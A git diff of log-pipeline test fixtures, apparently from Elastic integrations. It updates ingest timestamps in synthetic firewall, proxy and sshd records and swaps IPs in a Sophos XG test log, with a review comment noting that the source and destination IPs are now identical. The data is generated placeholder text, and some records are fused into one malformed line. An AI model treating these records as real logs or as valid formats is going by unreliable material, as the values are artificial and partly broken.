prec=corpori caller=cillumd engine=umdol localip=turmagn host=mni4032.lan extra=amrem server=10.202.65.2 cookie=queporr set-cookie=oide", "event": { - "ingested": "2021-10-26T10:41:54.239049525Z" + "ingested": "2021-12-09T13:44:53.094188900Z" }, "tags": [ "preserve_original_event" @@ -690,7 +690,7 @@ }, "message": "2018:4:22-23:36:32 iscing6960.api.invalid reverseproxy: [emipsu] [incidu:very-high] [pid 5350:itation] SSL Library Error: error:itasper:failure", "event": { - "ingested": "2021-10-26T10:41:54.239050904Z" + "ingested": "2021-12-09T13:44:53.094194500Z" }, "tags": [ "preserve_original_event" 
@@ -702,7 +702,7 @@ }, "message": "2018:5:7-06:39:06 httpd[793]: [ruredo:success] [pid nculpaq:mides] [client iconseq] ModSecurity: Warning. nidolo [file \"runtmoll\"] [line \"tuserror\"] [id \"utlabo\"] [rev \"scip\"] [msg \"imvenia\"] [severity \"low\"] [ver \"1.6420\"] [maturity \"nisi\"] [accuracy \"seq\"] [tag \"ors\"] [hostname \"olupta3647.host\"] [uri \"uaUteni\"] [unique_id \"gitsedqu\"]amqu", "event": { - "ingested": "2021-10-26T10:41:54.239052256Z" + "ingested": "2021-12-09T13:44:53.094200300Z" }, "tags": [ "preserve_original_event" @@ -714,7 +714,7 @@ }, "message": "2018:5:21-13:41:41 named[6633]: FORMERR resolving 'iavolu7814.www5.localhost': 10.194.12.83#elit", "event": { - "ingested": "2021-10-26T10:41:54.239053610Z" + "ingested": "2021-12-09T13:44:53.094206Z" }, "tags": [ "preserve_original_event" 
@@ -726,7 +726,7 @@ }, "message": "2018:6:4-20:44:15 astarosg_TVM[5792]: id=elitess severity=low sys=amqua sub=mavenia name=checking if admin is enabledaction=cancel method=doc client=teurs facility=eturadi user=eturadip srcip=10.33.138.154 dstip=10.254.28.41 version=1.4256 storage=volupta ad_domain=dolor object=dolorsit class=tfugits type=lor attributes=oremcount=utper node=ueips account=umqustatuscode=ntexpli cached=siuta profile=porincid filteraction=itame size=1026 request=fugiat url=https://www5.example.org/etcons/aecatc.jpg?ditem=tut#oditautf referer=https://internal.example.org/eddoei/iatqu.htm?itessec=dat#tdol error=emul authtime=ariatu dnstime=luptate cattime=umdolore avscantime=iutaliq fullreqtime=oriosamn device=oluptate auth=tcu ua=mmodo exceptions=rauto group=lup category=orem categoryname=tutl content-type=iusmo reputation=uiavolu application=eri app-id=pis reason=riosam filename=isa file=nonnum extension=Nemoenim time=itati function=cancel line=nes message=atvolupt fwrule=umwritt seq=uae initf=enp0s3792 outitf=lo2114 dstmac=01:00:5e:24:b8:9f srcmac=01:00:5e:a1:a3:9f proto=bil length=itten tos=icer prec=;dolo ttl=siutaliq srcport=1455 dstport=6937 tcpflags=pexeaco info=ercitati prec=dexea caller=tasnul engine=onu localip=orisnisi host=obea2960.mail.corp extra=dolor server=10.45.12.53 cookie=etdo set-cookie=edictas", "event": { - "ingested": "2021-10-26T10:41:54.239055031Z" + "ingested": "2021-12-09T13:44:53.094211800Z" }, "tags": [ "preserve_original_event" @@ -738,7 +738,7 @@ }, "message": "2018:6:19-03:46:49 frox[7744]: Listening on 10.99.134.49:2274", "event": { - "ingested": "2021-10-26T10:41:54.239056456Z" + "ingested": "2021-12-09T13:44:53.094217Z" }, "tags": [ "preserve_original_event" 
@@ -750,7 +750,7 @@ }, "message": "2018:7:3-10:49:23 olli5982.www.test reverseproxy: [asp] [uatDui:medium] [pid 212:unde] [client raut] [suscip] virus daemon error found in request ectetu, referer: https://example.com/ariat/ptatemU.txt?cusan=ueipsaq#upid", "event": { - "ingested": "2021-10-26T10:41:54.239057849Z" + "ingested": "2021-12-09T13:44:53.094221900Z" }, "tags": [ "preserve_original_event" @@ -762,7 +762,7 @@ }, "message": "2018:7:17-17:51:58 nsecte3644.internal.test reverseproxy: [tutla] [isund:high] [pid 3136:uidex] [client uptate] Invalid signature, cookie: JSESSIONID", "event": { - "ingested": "2021-10-26T10:41:54.239059219Z" + "ingested": "2021-12-09T13:44:53.094227600Z" }, "tags": [ "preserve_original_event" @@ -774,7 +774,7 @@ }, "message": "2018:8:1-00:54:32 confd[4157]: id=onseq severity=very-high sys=siutaliq sub=aliqu name=serro client=ctet facility=umiurere user=antium srcip=10.32.85.21 version=1.7852 storage=eaco object=onp class=ectetur type=ione attributes=utlaborecount=nci node=acommodi account=etconsec", "event": { - "ingested": "2021-10-26T10:41:54.239060590Z" + "ingested": "2021-12-09T13:44:53.094233400Z" }, "tags": [ "preserve_original_event" @@ -786,7 +786,7 @@ }, "message": "2018:8:15-07:57:06 econseq7119.www.home sshd: error: Could not get shadow information for NOUSER", "event": { - "ingested": "2021-10-26T10:41:54.239061978Z" + "ingested": "2021-12-09T13:44:53.094237700Z" }, "tags": [ "preserve_original_event" @@ -798,7 +798,7 @@ }, "message": "2018:8:29-14:59:40 ant2543.www5.lan reverseproxy: [uaturve] [lapa:high] [pid 3669:idu] [client sed] [utem] cannot read reply: Operation now in progress (115), referer: https://example.com/oremagn/ehenderi.htm?mdolo=ionul#oeiusmo", "event": { - "ingested": "2021-10-26T10:41:54.239063358Z" + "ingested": "2021-12-09T13:44:53.094242400Z" }, "tags": [ "preserve_original_event" 
@@ -810,7 +810,7 @@ }, "message": "2018:9:12-22:02:15 pluto[7138]: | sent accept notification olore with seqno = urEx", "event": { - "ingested": "2021-10-26T10:41:54.239064738Z" + "ingested": "2021-12-09T13:44:53.094248100Z" }, "tags": [ "preserve_original_event" @@ -822,7 +822,7 @@ }, "message": "2018:9:27-05:04:49 httpd[6562]: id=iurere severity=medium sys=erc sub=atu name=http accessaction=accept method=odte client=uis facility=sedquia user=reetd srcip=10.210.175.52 dstip=10.87.14.186 version=1.7641 storage=tasu ad_domain=mquae object=CSedu class=atae type=aeconseq attributes=boNemocount=duntutla node=mqu account=inimastatuscode=emipsum cached=venia profile=Loremi filteraction=uisnostr size=849 request=vol url=https://internal.example.com/ritat/dipi.jpg?aliquide=aliqui#agnaaliq referer=https://api.example.org/Bonorume/emeumfu.txt?iuntNequ=ender#quid error=mipsa authtime=teturad dnstime=nimide cattime=spernat avscantime=nevolu fullreqtime=itectobe device=rroq auth=itessequ ua=uunt exceptions=pic group=unt category=emUt categoryname=eiru content-type=sauteir reputation=pic application=caecatc app-id=iarc reason=emquia filename=duntutl file=idi extension=reetdo time=pidatatn function=cancel line=ncul message=mcorpor fwrule=ofd seq=lapariat initf=eth65 outitf=lo3615 dstmac=01:00:5e:b3:e3:90 srcmac=01:00:5e:0e:b3:8e proto=consequ length=min tos=riame prec=;gnaal ttl=nti srcport=1125 dstport=605 tcpflags=utlab info=colabo prec=ditem caller=did engine=BCS localip=idex host=nisiuta4810.api.test extra=apa server=10.85.200.58 cookie=esse set-cookie=idexeac port=2294 query=iatquovo uid=rExce", "event": { - "ingested": "2021-10-26T10:41:54.239066188Z" + "ingested": "2021-12-09T13:44:53.094253200Z" }, "tags": [ "preserve_original_event" 
@@ -834,7 +834,7 @@ }, "message": "2018:10:11-12:07:23 itametc1599.api.test ulogd: id=itaedi severity=low sys=ore sub=ips name=Authentication successful action=block fwrule=iamqu seq=aboN initf=eth2679 outitf=enp0s1164 dstmac=01:00:5e:c3:8a:24 srcmac=01:00:5e:5a:9d:a9 srcip=10.133.45.45 dstip=10.115.166.48 proto=utaliq length=icer tos=essequ prec=oeiu ttl=nsequa srcport=4180 dstport=4884 tcpflags=squa info=etM code=eve type=iru", "event": { - "ingested": "2021-10-26T10:41:54.239067650Z" + "ingested": "2021-12-09T13:44:53.094257300Z" }, "tags": [ "preserve_original_event" @@ -846,7 +846,7 @@ }, "message": "2018:10:25-19:09:57 tiumt5462.mail.localhost sshd: Invalid user admin from runt", "event": { - "ingested": "2021-10-26T10:41:54.239069067Z" + "ingested": "2021-12-09T13:44:53.094261800Z" }, "tags": [ "preserve_original_event" @@ -858,7 +858,7 @@ }, "message": "2018:11:9-02:12:32 vol1450.internal.host sshd: Server listening on 10.71.184.162 port 3506.", "event": { - "ingested": "2021-10-26T10:41:54.239070438Z" + "ingested": "2021-12-09T13:44:53.094266500Z" }, "tags": [ "preserve_original_event" @@ -870,7 +870,7 @@ }, "message": "2018:11:23-09:15:06 ipsec_starter[178]: IP address or index of physical interface changed -\u003e reinit of ipsec interface", "event": { - "ingested": "2021-10-26T10:41:54.239071873Z" + "ingested": "2021-12-09T13:44:53.094271400Z" }, "tags": [ "preserve_original_event" @@ -882,7 +882,7 @@ }, "message": "2018:12:7-16:17:40 rporissu573.api.test reverseproxy: [exercita] [emaperi:very-high] [pid 5943:ddoei] AH02312: Fatal error initialising mod_ssl, nihi.", "event": { - "ingested": "2021-10-26T10:41:54.239073252Z" + "ingested": "2021-12-09T13:44:53.094277Z" }, "tags": [ "preserve_original_event" 
@@ -894,7 +894,7 @@ }, "message": "2018:12:21-23:20:14 nostru774.corp URID: T=tatnonp ------ 1 - [exit] allow: natuserr", "event": { - "ingested": "2021-10-26T10:41:54.239074738Z" + "ingested": "2021-12-09T13:44:53.094283100Z" }, "tags": [ "preserve_original_event" @@ -906,7 +906,7 @@ }, "message": "2019:1:5-06:22:49 ipsec_starter[6226]: IP address or index of physical interface changed -\u003e reinit of ipsec interface", "event": { - "ingested": "2021-10-26T10:41:54.239076149Z" + "ingested": "2021-12-09T13:44:53.094288900Z" }, "tags": [ "preserve_original_event" @@ -918,7 +918,7 @@ }, "message": "2019:1:19-13:25:23 httpd[5037]: [iadese:unknown] [pid isundeo:emq] [client rehender] ModSecurity: Warning. uat [file \"apa\"] [line \"tani\"] [id \"per\"] [rev \"ngelitse\"] [msg \"olorsita\"] [severity \"medium\"] [ver \"1.7102\"] [maturity \"apariat\"] [accuracy \"iuntNequ\"] [tag \"rExc\"] [hostname \"lorsita2216.www5.example\"] [uri \"turvelil\"] [unique_id \"velitsed\"]rau", "event": { - "ingested": "2021-10-26T10:41:54.239077572Z" + "ingested": "2021-12-09T13:44:53.094294500Z" }, "tags": [ "preserve_original_event" @@ -930,7 +930,7 @@ }, "message": "2019:2:2-20:27:57 sum2208.host reverseproxy: [eir] [nia:medium] [pid 4346:mco] [client ritinvol] [quioffi] mod_avscan_check_file_single_part() called with parameter filename=quamquae", "event": { - "ingested": "2021-10-26T10:41:54.239079008Z" + "ingested": "2021-12-09T13:44:53.094300200Z" }, "tags": [ "preserve_original_event" @@ -942,7 +942,7 @@ }, "message": "2019:2:17-03:30:32 ore6843.local reverseproxy: [usmodite] [aveniam:medium] [pid 5126:xplicab] [client taev] No signature found, cookie: dictasu", "event": { - "ingested": "2021-10-26T10:41:54.239080402Z" + "ingested": "2021-12-09T13:44:53.094305900Z" }, "tags": [ "preserve_original_event" 
@@ -954,7 +954,7 @@ }, "message": "2019:3:3-10:33:06 Sedu1610.mail.corp reverseproxy: [audant] [porr:medium] [pid 7442:tation] [client uunturma] AH01114: cons: failed to make connection to backend: 10.177.35.133", "event": { - "ingested": "2021-10-26T10:41:54.239081733Z" + "ingested": "2021-12-09T13:44:53.094311700Z" }, "tags": [ "preserve_original_event" @@ -966,7 +966,7 @@ }, "message": "2019:3:17-17:35:40 corpo6737.example reverseproxy: [officiad] [aliquide:very-high] [pid 6600:errorsi] [client raincidu] [orincidi] cannot connect: failure (111)", "event": { - "ingested": "2021-10-26T10:41:54.239083085Z" + "ingested": "2021-12-09T13:44:53.094319Z" }, "tags": [ "preserve_original_event" @@ -978,7 +978,7 @@ }, "message": "2019:4:1-00:38:14 pop3proxy[6854]: Master started", "event": { - "ingested": "2021-10-26T10:41:54.239084487Z" + "ingested": "2021-12-09T13:44:53.094324900Z" }, "tags": [ "preserve_original_event" @@ -990,7 +990,7 @@ }, "message": "2019:4:15-07:40:49 eratvol314.www.home pop3proxy: Master started", "event": { - "ingested": "2021-10-26T10:41:54.239085935Z" + "ingested": "2021-12-09T13:44:53.094330700Z" }, "tags": [ "preserve_original_event" @@ -1002,7 +1002,7 @@ }, "message": "2019:4:29-14:43:23 utemvele1838.mail.test reverseproxy: [xplicabo] [aco:high] [pid 2389:ratione] [client nrepr] ModSecurity: Warning. uipex [file \"alorumw\"] [line \"nibus\"] [id \"eiusmo\"] [msg \"rci\"] [hostname \"seosquir715.local\"] [uri \"ercitati\"] [unique_id \"uiration\"]", "event": { - "ingested": "2021-10-26T10:41:54.239087286Z" + "ingested": "2021-12-09T13:44:53.094336500Z" }, "tags": [ "preserve_original_event" @@ -1014,7 +1014,7 @@ }, "message": "2019:5:13-21:45:57 ulapari2656.local reverseproxy: [itessec] [non:very-high] [pid 2237:licaboN] [client nvol] [moenimip] cannot connect: failure (111)", "event": { - "ingested": "2021-10-26T10:41:54.239088679Z" + "ingested": "2021-12-09T13:44:53.094342200Z" }, "tags": [ "preserve_original_event" 
@@ -1026,7 +1026,7 @@
 },
 "message": "2019:5:28-04:48:31 reverseproxy[4278]: [ritat] [iscinge:very-high] [pid 4264:rroquisq] [client tnonpro] [nimv] erunt while reading reply from cssd, referer: https://example.org/etcon/ipitlab.gif?utlabore=suscipi#tlabor",
 "event": {
- "ingested": "2021-10-26T10:41:54.239117653Z"
+ "ingested": "2021-12-09T13:44:53.094347900Z"
 },
 "tags": [
 "preserve_original_event"
@@ -1038,7 +1038,7 @@
 },
 "message": "2019:6:11-11:51:06 URID[7418]: T=xer ------ 1 - [exit] cancel: onemul",
 "event": {
- "ingested": "2021-10-26T10:41:54.239120712Z"
+ "ingested": "2021-12-09T13:44:53.094353500Z"
 },
 "tags": [
 "preserve_original_event"
@@ -1050,7 +1050,7 @@
 },
 "message": "2019:6:25-18:53:40 pluto[7201]: | handling event ips for 10.165.217.56 \"econse\" #otamr",
 "event": {
- "ingested": "2021-10-26T10:41:54.239122376Z"
+ "ingested": "2021-12-09T13:44:53.094359200Z"
 },
 "tags": [
 "preserve_original_event"
@@ -1062,7 +1062,7 @@
 },
 "message": "2019:7:10-01:56:14 stla2856.host reverseproxy: [onpro] [adolo:very-high] [pid 7766:siste] ModSecurity for Apache/nisiut (ostr) configured.",
 "event": {
- "ingested": "2021-10-26T10:41:54.239123879Z"
+ "ingested": "2021-12-09T13:44:53.094364900Z"
 },
 "tags": [
 "preserve_original_event"
@@ -1074,7 +1074,7 @@
 },
 "message": "2019:7:24-08:58:48 peri6748.www5.domain reverseproxy: [cingeli] [esseq:high] [pid 2404:aquae] AH00098: pid file otamrema overwritten -- Unclean shutdown of previous Apache run?",
 "event": {
- "ingested": "2021-10-26T10:41:54.239125287Z"
+ "ingested": "2021-12-09T13:44:53.094370600Z"
 },
 "tags": [
 "preserve_original_event"
@@ -1086,7 +1086,7 @@
 },
 "message": "2019:8:7-16:01:23 tnon5442.internal.test reverseproxy: [ive] [tquido:very-high] [pid 6108:taliquip] AH00295: caught accept, ectetu",
 "event": {
- "ingested": "2021-10-26T10:41:54.239126679Z"
+ "ingested": "2021-12-09T13:44:53.094376300Z"
 },
 "tags": [
 "preserve_original_event"
@@ -1098,7 +1098,7 @@
 },
 "message": "2019:8:21-23:03:57 ariatu2606.www.host reverseproxy: [quamestq] [umquid:very-high] [pid 7690:rem] [client its] [inv] not all the file sent to the client: rin, referer: https://example.org/tation/tutlabo.jpg?amvo=ullamco#tati",
 "event": {
- "ingested": "2021-10-26T10:41:54.239128073Z"
+ "ingested": "2021-12-09T13:44:53.094382100Z"
 },
 "tags": [
 "preserve_original_event"
@@ -1110,7 +1110,7 @@
 },
 "message": "2019:9:5-06:06:31 imv1805.api.host ulogd: id=oenim severity=very-high sys=iaturExc sub=orsit name=ICMP flood detected action=cancel fwrule=eos seq=quameius initf=lo4665 outitf=lo3422 dstmac=01:00:5e:d6:f3:bc srcmac=01:00:5e:87:02:08 srcip=10.96.243.231 dstip=10.248.62.55 proto=ugiat length=quiin tos=apar prec=eleumiur ttl=chite srcport=5632 dstport=4206 tcpflags=tevelit info=etc code=lorem type=temvele",
 "event": {
- "ingested": "2021-10-26T10:41:54.239129424Z"
+ "ingested": "2021-12-09T13:44:53.094387900Z"
 },
 "tags": [
 "preserve_original_event"
@@ -1122,7 +1122,7 @@
 },
 "message": "2019:9:19-13:09:05 rita600.www5.localdomain reverseproxy: [ini] [elite:high] [pid 7650:mnisiut] AH00959: ap_proxy_connect_backend disabling worker for (10.132.101.158) for cipitlabs",
 "event": {
- "ingested": "2021-10-26T10:41:54.239130807Z"
+ "ingested": "2021-12-09T13:44:53.094393600Z"
 },
 "tags": [
 "preserve_original_event"
@@ -1134,7 +1134,7 @@
 },
 "message": "2019:10:3-20:11:40 sshd[2014]: Did not receive identification string from rroq",
 "event": {
- "ingested": "2021-10-26T10:41:54.239132267Z"
+ "ingested": "2021-12-09T13:44:53.094399300Z"
 },
 "tags": [
 "preserve_original_event"
@@ -1146,7 +1146,7 @@
 },
 "message": "2019:10:18-03:14:14 admini1122.www.local reverseproxy: [ritte] [umwritte:very-high] [pid 1817:atu] (13)failure: [client vol] AH01095: prefetch request body failed to 10.96.193.132:5342 (orumwr) from bori ()",
 "event": {
- "ingested": "2021-10-26T10:41:54.239133668Z"
+ "ingested": "2021-12-09T13:44:53.094405Z"
 },
 "tags": [
 "preserve_original_event"
@@ -1158,7 +1158,7 @@
 },
 "message": "2019:11:1-10:16:48 confd[2475]: id=utaliqu severity=low sys=xplicabo sub=quamni name=dol client=sisten facility=remeumf user=acommod srcip=10.96.200.83 version=1.7416 storage=sper object=asia class=roident type=olorem attributes=teursintcount=evelites node=nostr account=lapariat",
 "event": {
- "ingested": "2021-10-26T10:41:54.239135048Z"
+ "ingested": "2021-12-09T13:44:53.094410800Z"
 },
 "tags": [
 "preserve_original_event"
@@ -1170,7 +1170,7 @@
 },
 "message": "2019:11:15-17:19:22 emvel4391.localhost sshd: Did not receive identification string from quelaud",
 "event": {
- "ingested": "2021-10-26T10:41:54.239136442Z"
+ "ingested": "2021-12-09T13:44:53.094416500Z"
 },
 "tags": [
 "preserve_original_event"
@@ -1182,7 +1182,7 @@
 },
 "message": "2019:11:30-00:21:57 confd-sync[5454]: id=smodite severity=high sys=utpersp sub=rnatu name=ico",
 "event": {
- "ingested": "2021-10-26T10:41:54.239137882Z"
+ "ingested": "2021-12-09T13:44:53.094422200Z"
 },
 "tags": [
 "preserve_original_event"
@@ -1194,7 +1194,7 @@
 },
 "message": "2019:12:14-07:24:31 untinc5531.www5.test sshd: error: Could not get shadow information for NOUSER",
 "event": {
- "ingested": "2021-10-26T10:41:54.239139272Z"
+ "ingested": "2021-12-09T13:44:53.094427800Z"
 },
 "tags": [
 "preserve_original_event"
diff --git a/packages/sophos/data_stream/xg/_dev/test/pipeline/test-sophos-xg.log b/packages/sophos/data_stream/xg/_dev/test/pipeline/test-sophos-xg.log
index 945ece7204b..4fff1a3b93c 100644
--- a/packages/sophos/data_stream/xg/_dev/test/pipeline/test-sophos-xg.log
+++ b/packages/sophos/data_stream/xg/_dev/test/pipeline/test-sophos-xg.log 
@@ -1,7 +1,7 @@ <30>device="SFW" date=2020-05-18 time=14:38:48 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=041101618035 log_type="Anti-Spam" log_component="SMTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=0 user_name="" av_policy_name="None" from_email_address="firewall@firewallgate.com" to_email_address="Sysadmin@elasticuser.com" email_subject="*ALERT* Sophos XG Firewall" mailid="qkW2Y6-LxBk6U-vH-1590055245" mailsize=19728 spamaction="QUEUED" reason="Email has been accepted by Device and queued for scanning." src_domainname="elasticuser.com" dst_domainname="" src_ip="" src_country_code="" dst_ip="" dst_country_code="" protocol="TCP" src_port=0 dst_port=0 sent_bytes=0 recv_bytes=0 quarantine_reason="Other" -<30>device="SFW" date=2020-05-18 time=14:38:49 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=041105613003 log_type="Anti-Spam" log_component="SMTP" log_subtype="Clean" status="" priority=Information fw_rule_id=22 user_name="" av_policy_name="Default" from_email_address="telekommunikation@constant-big.email" to_email_address="info@pelasticuser.com" email_subject="Telefonservice statt Anrufbeantworter" mailid="device="SFW" date=2020-05-18 time=14:38:50 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=041107413001 log_type="Anti-Spam" log_component="SMTP" log_subtype="Spam" status="" priority=Warning fw_rule_id=22 user_name="" av_policy_name="Spam" from_email_address="ripxfc@17buddies.net" to_email_address="hein.mueck@elasticuser.de" email_subject="nimm dringend Geld" mailid="device="SFW" date=2020-05-18 time=14:38:51 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=045908413004 log_type="Anti-Spam" log_component="SMTPS" log_subtype="Probable Spam" status="" priority=Warning fw_rule_id=22 user_name="" av_policy_name="rule3" from_email_address="SHERIF.TOBGI@ELTOBGI.COM" to_email_address="info@elasticuser.com" email_subject="09F1A19017 - 65T BP LNG Hybrid 
- TS-V-061-01 - HVAC Package - RFQ - BCD - 27-May-20" mailid="<20200518070235.C1623996C64F9957@ELTOBGI.COM>" mailsize=1032152 spamaction="Prefix Subject" reason="Sender IP address is blacklisted." src_domainname="ELTOBGI.COM" dst_domainname="" src_ip=77.72.3.56 src_country_code=GBR dst_ip=185.8.209.194 dst_country_code=DEU protocol="TCP" src_port=55002 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="RBL" +<30>device="SFW" date=2020-05-18 time=14:38:49 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=041105613003 log_type="Anti-Spam" log_component="SMTP" log_subtype="Clean" status="" priority=Information fw_rule_id=22 user_name="" av_policy_name="Default" from_email_address="telekommunikation@constant-big.email" to_email_address="info@pelasticuser.com" email_subject="Telefonservice statt Anrufbeantworter" mailid="device="SFW" date=2020-05-18 time=14:38:50 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=041107413001 log_type="Anti-Spam" log_component="SMTP" log_subtype="Spam" status="" priority=Warning fw_rule_id=22 user_name="" av_policy_name="Spam" from_email_address="ripxfc@17buddies.net" to_email_address="hein.mueck@elasticuser.de" email_subject="nimm dringend Geld" mailid="device="SFW" date=2020-05-18 time=14:38:51 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=045908413004 log_type="Anti-Spam" log_component="SMTPS" log_subtype="Probable Spam" status="" priority=Warning fw_rule_id=22 user_name="" av_policy_name="rule3" from_email_address="SHERIF.TOBGI@ELTOBGI.COM" to_email_address="info@elasticuser.com" email_subject="09F1A19017 - 65T BP LNG Hybrid - TS-V-061-01 - HVAC Package - RFQ - BCD - 27-May-20" mailid="<20200518070235.C1623996C64F9957@ELTOBGI.COM>" mailsize=1032152 spamaction="Prefix Subject" reason="Sender IP address is blacklisted." 
src_domainname="ELTOBGI.COM" dst_domainname="" src_ip=175.16.199.1 src_country_code=GBR dst_ip=175.16.199.1 dst_country_code=DEU protocol="TCP" src_port=55002 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="RBL" <30>device="SFW" date=2017-01-31 time=18:34:41 timezone="IST" device_name="CR750iNG-XP" device_id=C44313350024-P29PUA log_id=041113413005 log_type="Anti-Spam" log_component="SMTP" log_subtype="Outbound Spam" status="" priority=Warning fw_rule_id=0 user_name="gaurav" av_policy_name="Gaurav123" from_email_address="gaurav1@iview.com" to_email_address=" gaurav2@iview.com" email_subject="RPD Spam Test: Spam" mailid="" mailsize=405 spamaction="Accept" reason="" src_domainname=" iview.com" dst_domainname="" src_ip=10.198.47.71 src_country_code=R1 dst_ip=10.198.233.61 dst_country_code=R1 protocol="TCP" src_port=22420 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Spam" <30>device="SFW" date=2018-06-06 time=11:10:11 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=041114413006 log_type="Anti-Spam" log_component="SMTP" log_subtype="Outbound Probable Spam" status="" priority=Warning fw_rule_id=0 user_name="" av_policy_name="rule 8" from_email_address="pankhil@postman.local" to_email_address="pankhil1@Postman.local" email_subject="RPD Spam test: Bulk" mailid="" mailsize=439 spamaction="Drop" reason="Mail detected as OUTBOUND PROBABLE SPAM." src_domainname="postman.local" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.234.240 dst_country_code=R1 protocol="TCP" src_port=58043 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Spam" <30>device="SFW" date=2018-06-06 time=12:50:07 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=041121613009 log_type="Anti-Spam" log_component="SMTP" log_subtype="DLP" status="" priority=Information fw_rule_id=0 user_name="" av_policy_name="postman" from_email_address="pankhil@postman.local" to_email_address="pankhil1@Postman. 
local" email_subject="Fwd: TESt" mailid="c0000002-1528269606" mailsize=5041 spamaction="DROP" reason="Email containing confidential data detected. Relevant Data Protection Policy applied." src_domainname="postman.local" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.17.121 dst_country_code=R1 protocol="TCP" src_port=60134 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="DLP" 
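Review bot: The rewritten Probable Spam record in this hunk sets both `src_ip=175.16.199.1` and `dst_ip=175.16.199.1`, so the expected output for this line can no longer distinguish a pipeline that swaps or mis-maps source.ip and destination.ip from a correct one; if the supported test subset offers more than one address, source and destination should get different ones. The same src/dst collapse repeats throughout the following hunk (`@@ -9,39 +9,39 @@`), which runs past this view. The record also keeps `src_country_code=GBR` and `dst_country_code=DEU` for a single address, so if the pipeline's geo fields come from a GeoIP lookup rather than from these tokens the stated codes now disagree with the address, which is presumably harmless for the test but worth confirming against the expected-output file. The fused `mailid="device="SFW" ...` segments are carried over unchanged from the old line; if that is deliberate malformed-record coverage it is fine, otherwise the 14:38:50 and 14:38:51 records are never parsed on their own.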
@@ -9,39 +9,39 @@ <30>device="SFW" date=2018-06-06 time=12:53:39 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=041123413012 log_type="Anti-Spam" log_component="SMTP" log_subtype="Dos" status="" priority=Warning fw_rule_id=0 user_name="" av_policy_name="None" from_email_address="" to_email_address="" email_subject="" mailid="" mailsize=0 spamaction="TMPREJECT" reason="SMTP DoS" src_domainname="" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.17.121 dst_country_code=R1 protocol="TCP" src_port=60392 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Other" <30>device="SFW" date=2018-06-06 time=12:56:53 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=041102413014 log_type="Anti-Spam" log_component="SMTP" log_subtype="Denied" status="" priority=Warning fw_rule_id=0 user_name="" av_policy_name="postman" from_email_address="pankhil1@postman.local" to_email_address="pankhil@postman. local" email_subject="Fwd: test sand" mailid="c0000008-1528270010" mailsize=419835 spamaction="DROP" reason="Email is marked Malicious by Sophos Sandstorm." src_domainname="postman.local" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.17.121 dst_country_code=R1 protocol="TCP" src_port=60608 dst_port=25 sent_bytes=0 recv_bytes=0 <30>device="SFW" date=2017-01-31 time=18:31:11 timezone="IST" device_name="CR750iNG-XP" device_id=C44313350024-P29PUA log_id=041207414001 log_type="Anti-Spam" log_component="POP3" log_subtype="Spam" status="" priority=Warning fw_rule_id=0 user_name="gaurav" av_policy_name="GauravPatel" from_email_address="gaurav1@iview.com" to_email_address="gaurav2@iview. 
com" email_subject="RPD Spam Test: Spam" mailid="<2a2dd5d4-1a30-617b-27b1-7961ad07cf07@iview.com>" mailsize=574 spamaction="Accept" reason="" src_domainname=" iview.com" dst_domainname="iview.com" src_ip=10.198.47.71 src_country_code=R1 dst_ip=10.198.233.61 dst_country_code=R1 protocol="TCP" src_port=22333 dst_port=110 sent_bytes=0 recv_bytes=0 quarantine_reason="Other" -<30>device="SFW" date=2020-05-18 time=14:38:33 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=030906208001 log_type="Anti-Virus" log_component="HTTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=2 user_name="" iap=13 av_policy_name="" virus="Sandstorm" url="http://sophostest.com/Sandstorm/SBTestFile1.pdf" domainname="sophostest.com" src_ip=172.16.34.24 src_country_code=R1 dst_ip=13.226.155.93 dst_country_code=USA protocol="TCP" src_port=57695 dst_port=80 sent_bytes=550 recv_bytes=1616 user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" status_code=403 -<30>device="SFW" date=2020-05-18 time=14:38:34 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=030906208001 log_type="Anti-Virus" log_component="HTTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=2 user_name="" iap=13 av_policy_name="" virus="EICAR-AV-Test" url="http://sophostest.com/eicar/index.html" domainname="sophostest.com" src_ip=172.16.34.24 src_country_code=R1 dst_ip=13.226.155.18 dst_country_code=USA protocol="TCP" src_port=57835 dst_port=80 sent_bytes=541 recv_bytes=553 user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" status_code=403 -<30>device="SFW" date=2020-05-18 time=14:38:35 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=031106210001 log_type="Anti-Virus" log_component="SMTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=22 user_name="" av_policy_name="default-smtp-av" 
